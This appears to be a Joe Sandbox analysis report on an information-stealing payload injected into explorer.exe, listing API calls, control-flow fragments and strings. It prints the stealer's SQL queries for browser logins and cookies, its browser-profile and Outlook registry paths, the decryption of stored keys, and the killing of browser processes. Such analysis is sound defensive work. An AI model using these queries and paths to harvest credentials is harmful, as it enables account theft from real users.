68131->68133 68132->68090 68167 e45430c 21 API calls 68133->68167 68135 e453527 68137 e453c14 21 API calls 68135->68137 68144 e453561 68135->68144 68136 e453c14 21 API calls 68138 e4535a3 68136->68138 68142 e453543 memcpy_s 68137->68142 68139 e453c14 21 API calls 68138->68139 68140 e4535b2 68139->68140 68141 e453c14 21 API calls 68140->68141 68143 e4535c1 68141->68143 
68142->68144 68145 e453c14 21 API calls 68143->68145 68144->68136 68144->68142 68146 e4535d1 68145->68146 68147 e453cc0 21 API calls 68146->68147 68148 e4535e1 SHGetValueA 68147->68148 68148->68128 68149 e45362c 68148->68149 68150 e453cc0 21 API calls 68149->68150 68151 e453651 68150->68151 68151->68128 68154 e454215 68152->68154 68153 e453ef4 10 API calls 68155 e4542e9 68153->68155 68156 e45426d 68154->68156 68162 e454282 68154->68162 68182 e4d5280 10 API calls 2 library calls 68154->68182 68168 e453a44 68155->68168 68157 e454284 68156->68157 68158 e454274 68156->68158 68157->68162 68164 e453c14 21 API calls 68157->68164 68183 e4540ac 21 API calls new 68158->68183 68162->68153 68163 e4537c2 LoadLibraryA 68163->68096 68164->68162 68165->68106 68166->68113 68167->68135 68170 e453a63 68168->68170 68169 e453ac7 68171 e453b70 68169->68171 68172 e453ada 68169->68172 68170->68169 68174 e453a9d 68170->68174 68185 e4d5280 10 API calls 2 library calls 68171->68185 68175 e453b7c 68172->68175 68176 e453aed 68172->68176 68181 e453abf memcpy_s 68172->68181 68180 e453ef4 10 API calls 68174->68180 68186 e4d5280 10 API calls 2 library calls 68175->68186 68176->68181 68184 e4540ac 21 API calls new 68176->68184 68180->68181 68181->68163 68187->67927 68189->67943 68191->67958 68192->67958 68193->67958 68194->67963 68196 e457708 6 API calls 68195->68196 68197 e455971 CopyFileA 68196->68197 68198 e455986 wcsftime 68197->68198 68199 e45599e 68197->68199 68198->67968 68199->68198 68200 e455e5c 16 API calls 68199->68200 68201 e4559c2 68200->68201 68201->68198 68202 e4559ed GetProcessHeap HeapAlloc 68201->68202 68203 e455a23 68201->68203 68202->68203 68204 e455a0d 68202->68204 68205 e4a7ee8 CloseHandle 68203->68205 68204->68203 68206 e455a55 68205->68206 68207 e455a72 GetProcessHeap 68206->68207 68208 e455a5e GetProcessHeap 68206->68208 68210 e455a86 __free_lconv_num 68207->68210 68209 e4f5180 __free_lconv_num 68208->68209 68209->68207 68211 e455a94 DeleteFileA 68210->68211 68211->68198 
68212 3038a58 68213 3038a79 68212->68213 68215 3038a72 68212->68215 68214 3038b63 GetProcAddress GetProcAddressForCaller 68213->68214 68213->68215 68214->68215 68216 83843c4 68222 83841b4 68216->68222 68218 83843cd 68219 83843eb 68218->68219 68221 83843df 68218->68221 68221->68218 68244 838c704 NtDelayExecution 68221->68244 68223 83841d4 68222->68223 68245 8386cb4 68223->68245 68225 83841dd 68225->68218 68226 83841d9 68226->68225 68227 83841fa GetCurrentProcess IsWow64Process 68226->68227 68227->68225 68228 8384227 68227->68228 68257 8387274 GetAdaptersInfo 68228->68257 68230 838422c 68230->68225 68231 8384266 CreateMutexW 68230->68231 68231->68225 68232 8384286 GetLastError 68231->68232 68232->68225 68233 83842ac GetModuleHandleW 68232->68233 68264 8384c2c 15 API calls 68233->68264 68235 83842c1 68236 83842c5 68235->68236 68265 8387314 NtAllocateVirtualMemory 68235->68265 68236->68225 68238 83842d1 68238->68236 68266 83871f0 NtAllocateVirtualMemory 68238->68266 68240 83842e1 68240->68236 68241 83842ec CreateThread 68240->68241 68242 8384317 68241->68242 68267 8386c6c CreateThread 68242->68267 68244->68221 68246 8386cbd 68245->68246 68256 8386cf3 68246->68256 68268 838abe8 GetProcAddress 68246->68268 68248 8386ccf 68248->68256 68269 83899d0 GetProcAddress 68248->68269 68250 8386cd8 68250->68256 68270 838aa0c 68250->68270 68254 8386cea 68254->68256 68275 838b2a4 GetProcAddress 68254->68275 68256->68226 68258 83872ad 68257->68258 68263 83872d1 68257->68263 68276 838b388 NtAllocateVirtualMemory 68258->68276 68259 83872df 68259->68230 68262 83872b8 GetAdaptersInfo 68262->68263 68263->68259 68278 83882b4 68263->68278 68264->68235 68265->68238 68266->68240 68267->68236 68268->68248 68269->68250 68273 838ab3d 68270->68273 68271 8386ce1 68271->68256 68274 8389350 GetProcAddress 68271->68274 68272 838a8e0 7 API calls 68272->68273 68273->68271 68273->68272 68274->68254 68275->68256 68277 838b3c8 68276->68277 68277->68262 68279 83882ce NtFreeVirtualMemory 68278->68279 68280 
83882ef 68278->68280 68279->68280 68280->68259 68281 303545d 68282 30353a4 68281->68282 68283 3035265 68281->68283 68284 3035456 68282->68284 68286 30382b4 NtFreeVirtualMemory 68282->68286 68285 3035315 68283->68285 68287 3035292 68283->68287 68288 303532e HttpOpenRequestA 68285->68288 68286->68284 68289 30352c7 HttpOpenRequestA 68287->68289 68291 303539c 68288->68291 68289->68291 68291->68282 68292 30353b3 InternetSetOptionA 68291->68292 68293 30353d6 68291->68293 68292->68293 68294 3035424 HttpSendRequestA 68293->68294 68297 30353e0 68293->68297 68295 3035443 68294->68295 68295->68282 68296 303544c 68295->68296 68298 30382b4 NtFreeVirtualMemory 68296->68298 68299 30353fb HttpSendRequestA 68297->68299 68298->68284 68299->68295

                                                                    Control-flow Graph (first block e454b50-e454b9a; graph layout not recoverable from the extracted text, the API calls it contains are listed under APIs)
                                                                    APIs
                                                                      • Part of subcall function 0E454948: CreateToolhelp32Snapshot.KERNEL32 ref: 0E454969
                                                                      • Part of subcall function 0E454948: Process32First.KERNEL32 ref: 0E45498C
                                                                      • Part of subcall function 0E454948: GetCurrentProcessId.KERNEL32 ref: 0E45499A
                                                                      • Part of subcall function 0E454948: Process32Next.KERNEL32 ref: 0E454A58
                                                                      • Part of subcall function 0E454948: CloseHandle.KERNEL32 ref: 0E454A69
                                                                      • Part of subcall function 0E456E2C: GetProcessHeap.KERNEL32 ref: 0E456E30
                                                                      • Part of subcall function 0E456E2C: HeapAlloc.KERNEL32 ref: 0E456E42
                                                                      • Part of subcall function 0E458848: RegOpenKeyExA.ADVAPI32 ref: 0E45887F
                                                                      • Part of subcall function 0E458848: CoInitialize.OLE32 ref: 0E458891
                                                                      • Part of subcall function 0E458848: CoCreateInstance.OLE32 ref: 0E4588B4
                                                                      • Part of subcall function 0E458848: StrStrIW.SHLWAPI ref: 0E458933
                                                                      • Part of subcall function 0E458848: CoTaskMemFree.OLE32 ref: 0E458956
                                                                      • Part of subcall function 0E458848: CoTaskMemFree.OLE32 ref: 0E458965
                                                                      • Part of subcall function 0E458848: RegCloseKey.ADVAPI32 ref: 0E4589A1
                                                                      • Part of subcall function 0E4589E4: LoadLibraryA.KERNEL32 ref: 0E458A1B
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A37
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A4E
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A65
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A7C
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458A93
                                                                      • Part of subcall function 0E4589E4: GetProcAddress.KERNEL32 ref: 0E458AB1
                                                                      • Part of subcall function 0E454A90: GetProcessHeap.KERNEL32 ref: 0E454AE0
                                                                      • Part of subcall function 0E454A90: HeapReAlloc.KERNEL32 ref: 0E454AFA
                                                                      • Part of subcall function 0E456F6C: GetProcessHeap.KERNEL32 ref: 0E456F87
                                                                      • Part of subcall function 0E456F6C: HeapFree.KERNEL32 ref: 0E456F95
                                                                      • Part of subcall function 0E456F6C: GetProcessHeap.KERNEL32 ref: 0E456FA0
                                                                      • Part of subcall function 0E456F6C: HeapFree.KERNEL32 ref: 0E456FAE
                                                                      • Part of subcall function 0E4575F8: GetProcessHeap.KERNEL32 ref: 0E45765D
                                                                      • Part of subcall function 0E4575F8: HeapFree.KERNEL32 ref: 0E45766B
                                                                      • Part of subcall function 0E457C00: SHGetFolderPathA.SHELL32 ref: 0E457C3B
                                                                      • Part of subcall function 0E454A90: HeapAlloc.KERNEL32 ref: 0E454B06
                                                                      • Part of subcall function 0E45453C: lstrcpyA.KERNEL32 ref: 0E454564
                                                                      • Part of subcall function 0E45453C: lstrcatA.KERNEL32 ref: 0E454575
                                                                      • Part of subcall function 0E45453C: RegOpenKeyExA.ADVAPI32 ref: 0E454599
                                                                    • wsprintfA.USER32 ref: 0E4553BF
                                                                      • Part of subcall function 0E45453C: RegEnumKeyExA.ADVAPI32 ref: 0E4545E0
                                                                      • Part of subcall function 0E45453C: RegOpenKeyExA.ADVAPI32 ref: 0E454622
                                                                      • Part of subcall function 0E45453C: lstrcpyW.KERNEL32 ref: 0E454650
                                                                      • Part of subcall function 0E45453C: RegQueryValueExW.ADVAPI32 ref: 0E454686
                                                                      • Part of subcall function 0E45453C: RegCloseKey.ADVAPI32 ref: 0E4547A7
                                                                      • Part of subcall function 0E45453C: RegEnumKeyExA.ADVAPI32 ref: 0E4547DF
                                                                      • Part of subcall function 0E45453C: RegCloseKey.ADVAPI32 ref: 0E4547FA
                                                                    • SHGetFolderPathA.SHELL32 ref: 0E4554F3
                                                                    • lstrcatA.KERNEL32 ref: 0E455508
                                                                      • Part of subcall function 0E455ABC: SHGetFolderPathA.SHELL32 ref: 0E455AF7
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455690
                                                                    • HeapAlloc.KERNEL32 ref: 0E4556A2
                                                                    • WideCharToMultiByte.KERNEL32 ref: 0E4556D2
                                                                    • OpenFileMappingA.KERNEL32 ref: 0E4556F3
                                                                    • MapViewOfFile.KERNEL32 ref: 0E455718
                                                                    • UnmapViewOfFile.KERNEL32 ref: 0E455724
                                                                    • CloseHandle.KERNEL32 ref: 0E45572D
                                                                    • wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E45573D
                                                                    • wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E45574C
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455756
                                                                    • HeapFree.KERNEL32 ref: 0E455764
                                                                    • GetProcessHeap.KERNEL32 ref: 0E45576F
                                                                    • HeapFree.KERNEL32 ref: 0E45577D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$AddressProc$Close$AllocOpen$FileFolderPath$CreateEnumHandleProcess32TaskViewlstrcatlstrcpywprintf$ByteCharCurrentFirstInitializeInstanceLibraryLoadMappingMultiNextQuerySnapshotToolhelp32UnmapValueWidewsprintf
                                                                    • String ID: %s$%s$00:39:18$12345$1Email$1HTTP Server URL$1HTTP User$1HTTPMail Password2$1HTTPMail Server$1HTTPMail User Name$1IMAP Password2$1IMAP Server$1IMAP User$1IMAP User Name$1NNTP Email Address$1NNTP Password2$1NNTP Server$1NNTP User Name$1POP3 Password2$1POP3 Server$1POP3 User$1POP3 User Name$1SMTP Email Address$1SMTP Password2$1SMTP Server$1SMTP User$1SMTP User Name$2IMAP Port$2POP3 Port$2SMTP Port$360Browser\Browser$3HTTPMail Password$3IMAP Password$3NNTP Password$3POP3 Password$3SMTP Password$7Star\7Star$@$Amigo$Bromium$CentBrowser$Chedot$Chromium$CocCoc\Browser$Comodo\Dragon$Elements Browser$Epic Privacy Browser$Go!$Google\Chrome$Google\Chrome SxS$Kometa$Mar 29 2024$Microsoft\Edge$Nichrome$Orbitum$QIP Surf$Rafotech\Mustang$RockMelt$Safer Technologies\Secure Browser$Software\Microsoft\Office\%u.0\Outlook\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$Sputnik\Sputnik$Suhba$Superbird$Torch$Vivaldi$Xpom$Yandex\YandexBrowser$\Mozilla\Firefox\Profiles\$\User Data\Default\Login Data$\User Data\Default\Network\Cookies$\User Data\Default\Web Data$build$cookies.sqlite$cr_cookie$cr_pass$edge_cookie$edge_pass$ff_cookie$ff_pass$ie_cookie$ie_pass$outlook_pass$uCozMedia\Uran$w~y&

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 610 e454948-e454976 CreateToolhelp32Snapshot 611 e45497c-e454994 Process32First 610->611 612 e454a6f-e454a8c 610->612 613 e454a66-e454a69 CloseHandle 611->613 614 e45499a-e4549a2 call e4f5090 611->614 613->612 617 e454a50-e454a60 Process32Next 614->617 617->613 618 e4549a7-e4549b3 617->618 618->617 619 e4549b9-e4549bc 618->619 619->617 620 e4549c2-e4549d5 OpenProcess 619->620 620->617 621 e4549d7-e454a31 StrStrIA * 3 620->621 622 e454a33-e454a36 621->622 623 e454a3c-e454a41 TerminateProcess 621->623 622->623 624 e454a38-e454a3a 622->624 625 e454a47-e454a4a CloseHandle 623->625 624->623 624->625 625->617
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleProcess32$CreateCurrentFirstNextOpenSnapshotTerminateToolhelp32
                                                                    • String ID: chrome.exe$iexplore.exe$msedge.exe

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 626 e455e5c-e455e83 call e456500 629 e455e85-e455e87 626->629 630 e455e8c-e455e90 626->630 631 e455fcd-e455fe0 629->631 630->629 632 e455e92-e455ea9 StrStrIA 630->632 633 e455fb5-e455fca GetProcessHeap call e4f5180 632->633 634 e455eaf-e455ec4 StrChrA 632->634 633->631 634->633 636 e455eca-e455ed6 634->636 636->633 638 e455edc-e455eef call e456358 636->638 638->633 641 e455ef5-e455efb 638->641 641->633 642 e455f01-e455f36 CryptUnprotectData 641->642 642->633 643 e455f38-e455f56 GetProcessHeap HeapAlloc 642->643 643->633 644 e455f58-e455f63 643->644 645 e455f65-e455f68 644->645 646 e455fa1-e455faf LocalFree 644->646 645->646 647 e455f6a-e455f88 GetProcessHeap HeapAlloc 645->647 646->633 647->646 648 e455f8a-e455f8d 647->648 649 e455f90-e455f9c 648->649 649->649 650 e455f9e 649->650 650->646
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree$CreateCryptDataFileLocalUnprotect
                                                                    • String ID: "encrypted_key":"

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 684 e457a88-e457ac8 call e457708 CopyFileA 687 e457ae2-e457afc call e4d2b38 684->687 688 e457aca-e457ad3 call e4f50c0 684->688 694 e457adb-e457add 687->694 695 e457afe-e457b0c call e455e5c 687->695 693 e457ad5 call e4f50c0 688->693 688->694 693->694 697 e457be8-e457bff 694->697 695->694 700 e457b0e-e457b2a 695->700 701 e457b67 700->701 702 e457b2c-e457b2f 700->702 703 e457b69-e457ba0 call e4a7ee8 701->703 702->701 704 e457b31-e457b4f GetProcessHeap HeapAlloc 702->704 710 e457bb6-e457be3 GetProcessHeap call e4f5180 call e4d0c7c DeleteFileA 703->710 711 e457ba2-e457bb0 GetProcessHeap call e4f5180 703->711 704->701 705 e457b51-e457b54 704->705 707 e457b57-e457b63 705->707 707->707 709 e457b65 707->709 709->703 710->697 711->710
                                                                    APIs
                                                                      • Part of subcall function 0E457708: GetTempPathA.KERNEL32 ref: 0E457727
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E45773D
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E457746
                                                                      • Part of subcall function 0E457708: wsprintfA.USER32 ref: 0E45788A
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E4578A0
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E4578AD
                                                                    • CopyFileA.KERNEL32 ref: 0E457AC0
                                                                    • GetLastError.KERNEL32 ref: 0E457ACA
                                                                    • GetLastError.KERNEL32 ref: 0E457AD5
                                                                    • GetProcessHeap.KERNEL32 ref: 0E457B31
                                                                    • HeapAlloc.KERNEL32 ref: 0E457B43
                                                                    • GetProcessHeap.KERNEL32 ref: 0E457BA2
                                                                    • HeapFree.KERNEL32 ref: 0E457BB0
                                                                    • GetProcessHeap.KERNEL32 ref: 0E457BB6
                                                                    • HeapFree.KERNEL32 ref: 0E457BC4
                                                                    • DeleteFileA.KERNEL32 ref: 0E457BDD
                                                                    Strings
                                                                    • SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> '', xrefs: 0E457B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
                                                                    • String ID: SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> ''

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 651 e455944-e455984 call e457708 CopyFileA 654 e455986-e45598f call e4f50c0 651->654 655 e45599e-e4559b8 call e4d2b38 651->655 660 e455997-e455999 654->660 662 e455991 call e4f50c0 654->662 655->660 661 e4559ba-e4559c8 call e455e5c 655->661 663 e455aa4-e455abb 660->663 661->660 667 e4559ca-e4559e6 661->667 662->660 668 e455a23 667->668 669 e4559e8-e4559eb 667->669 671 e455a25-e455a5c call e4a7ee8 668->671 669->668 670 e4559ed-e455a0b GetProcessHeap HeapAlloc 669->670 670->668 672 e455a0d-e455a10 670->672 676 e455a72-e455a9f GetProcessHeap call e4f5180 call e4d0c7c DeleteFileA 671->676 677 e455a5e-e455a6c GetProcessHeap call e4f5180 671->677 675 e455a13-e455a1f 672->675 675->675 678 e455a21 675->678 676->663 677->676 678->671
                                                                    APIs
                                                                      • Part of subcall function 0E457708: GetTempPathA.KERNEL32 ref: 0E457727
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E45773D
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E457746
                                                                      • Part of subcall function 0E457708: wsprintfA.USER32 ref: 0E45788A
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E4578A0
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E4578AD
                                                                    • CopyFileA.KERNEL32 ref: 0E45597C
                                                                    • GetLastError.KERNEL32 ref: 0E455986
                                                                    • GetLastError.KERNEL32 ref: 0E455991
                                                                    • GetProcessHeap.KERNEL32 ref: 0E4559ED
                                                                    • HeapAlloc.KERNEL32 ref: 0E4559FF
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455A5E
                                                                    • HeapFree.KERNEL32 ref: 0E455A6C
                                                                    • GetProcessHeap.KERNEL32 ref: 0E455A72
                                                                    • HeapFree.KERNEL32 ref: 0E455A80
                                                                    • DeleteFileA.KERNEL32 ref: 0E455A99
                                                                    Strings
                                                                    • select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h, xrefs: 0E455A3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
                                                                    • String ID: select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 782 e4e9958-e4e9982 call e4e8e84 call e4e8eec 787 e4e9988-e4e9993 call e4e8e8c 782->787 788 e4e9b17-e4e9b85 call e4e1ffc call e4e2240 782->788 793 e4e9999-e4e99a4 call e4e8ebc 787->793 794 e4e9b02-e4e9b16 call e4e1ffc 787->794 804 e4e9b8e-e4e9b91 788->804 805 e4e9b87-e4e9b8c 788->805 802 e4e9aed-e4e9b01 call e4e1ffc 793->802 803 e4e99aa-e4e99cd call e4e4ed0 GetTimeZoneInformation 793->803 794->788 802->794 816 e4e9ac6-e4e9aec call e4e8e7c call e4e8e6c call e4e8e74 803->816 817 e4e99d3-e4e99f5 803->817 809 e4e9b98-e4e9b9d call e4e4f10 804->809 810 e4e9b93-e4e9b96 804->810 808 e4e9bdc-e4e9bee 805->808 813 e4e9bff call e4e9958 808->813 814 e4e9bf0-e4e9bf3 808->814 819 e4e9ba2-e4e9ba8 809->819 810->808 827 e4e9c04-e4e9c30 call e4e4ed0 call e4f2bd0 813->827 814->813 818 e4e9bf5-e4e9bfd call e4e9708 814->818 821 e4e99ff-e4e9a06 817->821 822 e4e99f7-e4e99fc 817->822 818->827 825 e4e9baa 819->825 826 e4e9bb3-e4e9bce call e4e2240 819->826 830 e4e9a08-e4e9a10 821->830 831 e4e9a20-e4e9a23 821->831 822->821 834 e4e9bac-e4e9bb1 call e4e4ed0 825->834 843 e4e9bd5-e4e9bd7 call e4e4ed0 826->843 844 e4e9bd0-e4e9bd3 826->844 830->831 839 e4e9a12-e4e9a1e 830->839 837 e4e9a26-e4e9a62 call e4ed96c call e4f5098 831->837 834->810 854 e4e9a64-e4e9a67 837->854 855 e4e9a72-e4e9a75 837->855 839->837 843->808 844->834 854->855 856 e4e9a69-e4e9a70 854->856 857 e4e9a78-e4e9aae call e4f5098 855->857 856->857 860 e4e9abf-e4e9ac3 857->860 861 e4e9ab0-e4e9ab3 857->861 860->816 861->860 862 e4e9ab5-e4e9abd 861->862 862->816
                                                                    APIs
                                                                    • _get_daylight.LIBCMT ref: 0E4E997B
                                                                      • Part of subcall function 0E4E8EEC: _invalid_parameter_noinfo.LIBCMT ref: 0E4E8F00
                                                                    • _get_daylight.LIBCMT ref: 0E4E998C
                                                                      • Part of subcall function 0E4E8E8C: _invalid_parameter_noinfo.LIBCMT ref: 0E4E8EA0
                                                                    • _get_daylight.LIBCMT ref: 0E4E999D
                                                                      • Part of subcall function 0E4E8EBC: _invalid_parameter_noinfo.LIBCMT ref: 0E4E8ED0
                                                                      • Part of subcall function 0E4E4ED0: HeapFree.KERNEL32 ref: 0E4E4EE6
                                                                      • Part of subcall function 0E4E4ED0: GetLastError.KERNEL32 ref: 0E4E4EF8
                                                                    • GetTimeZoneInformation.KERNEL32 ref: 0E4E99C4
                                                                    • WideCharToMultiByte.KERNEL32 ref: 0E4E9A5A
                                                                    • WideCharToMultiByte.KERNEL32 ref: 0E4E9AA6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                    • String ID: ?$Eastern Standard Time$Eastern Summer Time
                                                                    • API String ID: 500310315-688781733
                                                                    • Opcode ID: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
                                                                    • Instruction ID: 760b40b2ac6bf345eb2bf420496df6fde27c9103670259ae3ead9c41f2fa96b4
                                                                    • Opcode Fuzzy Hash: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
                                                                    • Instruction Fuzzy Hash: DF51D932610B80CAD715DF26EC8079A77A5FBC8799F880A57EB4957F98EB38C941C740

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 885 e457c00-e457c43 SHGetFolderPathA 886 e457c45-e457c47 885->886 887 e457c4c-e457c71 lstrcatA lstrlenA 885->887 888 e457cf5-e457d12 886->888 889 e457cf0 887->889 890 e457c73-e457c7a 887->890 889->888 891 e457c7d-e457ce0 lstrcpyA * 2 lstrcatA lstrlenA lstrcpyA call e457a88 890->891 893 e457ce5-e457cee 891->893 893->889 893->891
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpy$lstrcatlstrlen$FolderPath
                                                                    • String ID: \User Data\Local State
                                                                    • API String ID: 2128322890-3114309041
                                                                    • Opcode ID: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
                                                                    • Instruction ID: 9040e944883831ffed17ada27e024efc87e255be9b8d18300f819d3642b11d3a
                                                                    • Opcode Fuzzy Hash: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
                                                                    • Instruction Fuzzy Hash: 48211732724A8196DF50CF16E894B9A7365FB88F85F855432EA4E93728DF3CD90AC740

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 876 e455abc-e455aff SHGetFolderPathA 877 e455b01-e455b03 876->877 878 e455b08-e455b2d lstrcatA lstrlenA 876->878 879 e455bb2-e455bcf 877->879 880 e455bad 878->880 881 e455b2f-e455b36 878->881 880->879 882 e455b39-e455b9d lstrcpyA * 2 lstrcatA lstrlenA lstrcpyA call e455944 881->882 884 e455ba2-e455bab 882->884 884->880 884->882
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpy$lstrcatlstrlen$FolderPath
                                                                    • String ID: \User Data\Local State
                                                                    • API String ID: 2128322890-3114309041
                                                                    • Opcode ID: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
                                                                    • Instruction ID: 8ad00a79083416835ffc47665cb1ed659a25013ef5fad815799d3ade653bead5
                                                                    • Opcode Fuzzy Hash: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
                                                                    • Instruction Fuzzy Hash: DC315E32724A8196DF50CF12E894BAA7361F784F85F815422EA4E97728DF3CD90AC740
                                                                    APIs
                                                                    • SHGetFolderPathA.SHELL32 ref: 0E455DB6
                                                                    • SHGetFolderPathA.SHELL32 ref: 0E455E03
                                                                    • lstrcatA.KERNEL32 ref: 0E455E19
                                                                      • Part of subcall function 0E456604: lstrcpyA.KERNEL32 ref: 0E456633
                                                                      • Part of subcall function 0E456604: lstrlenA.KERNEL32 ref: 0E45663E
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E456662
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E456674
                                                                      • Part of subcall function 0E456604: FindFirstFileA.KERNEL32 ref: 0E456683
                                                                      • Part of subcall function 0E456604: lstrcpyA.KERNEL32 ref: 0E4566D2
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E4566E8
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E4566F7
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E456709
                                                                      • Part of subcall function 0E456604: FindNextFileA.KERNEL32 ref: 0E45680B
                                                                      • Part of subcall function 0E456604: FindClose.KERNEL32 ref: 0E45681C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$Find$FileFolderPathlstrcpy$CloseFirstNextlstrlen
                                                                    • String ID: .cookie$.txt$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
                                                                    • API String ID: 4173611902-356491070
                                                                    • Opcode ID: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
                                                                    • Instruction ID: 3431b4ab2ff9399ea195e299580bab0f7fc145b30b66eeec85f99f2e41c35d4b
                                                                    • Opcode Fuzzy Hash: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
